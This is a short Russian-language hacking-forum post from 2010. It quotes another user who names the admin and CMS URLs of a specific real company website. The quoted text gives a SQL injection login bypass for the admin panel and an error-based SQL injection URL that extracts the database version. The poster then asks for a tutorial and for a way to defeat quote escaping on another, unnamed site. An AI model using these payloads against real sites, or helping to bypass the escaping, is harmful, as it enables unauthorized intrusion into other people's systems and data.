11.11.2010, 19:05
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465
Репутация:
0
|
|
Сообщение от [Feldmarschall
"]
[Feldmarschall] said:
https://www.fortline.ru/manager/
+
http://www.fortline.ru/cms/index.php
------------------
LOGIN:
1' or 1=1# 1
PASS:
hgfjhgjtgfjthitufikjk
+в админке sql inj.
http://www.fortline.ru/cms/edit_cl.php?id=9'+or+(select+count(*)+from+informa tion_schema.tables+group+by+concat(version(),floor (rand(0)*2)))--+
P.S http://www.fortline.ru/cms/access.php
Слушай класс, а не можешь какой-нибудь мануал по такой уязвимости скинуть? Как так?
И вот такой вопрос на неком сайте вставляю такую же конструкцию, он мне выдает:
Введите Ваш логин и пароль 1\' or 1=1# 1
Тесть к кавычке подставляет слеш, как обойти?
|
|
|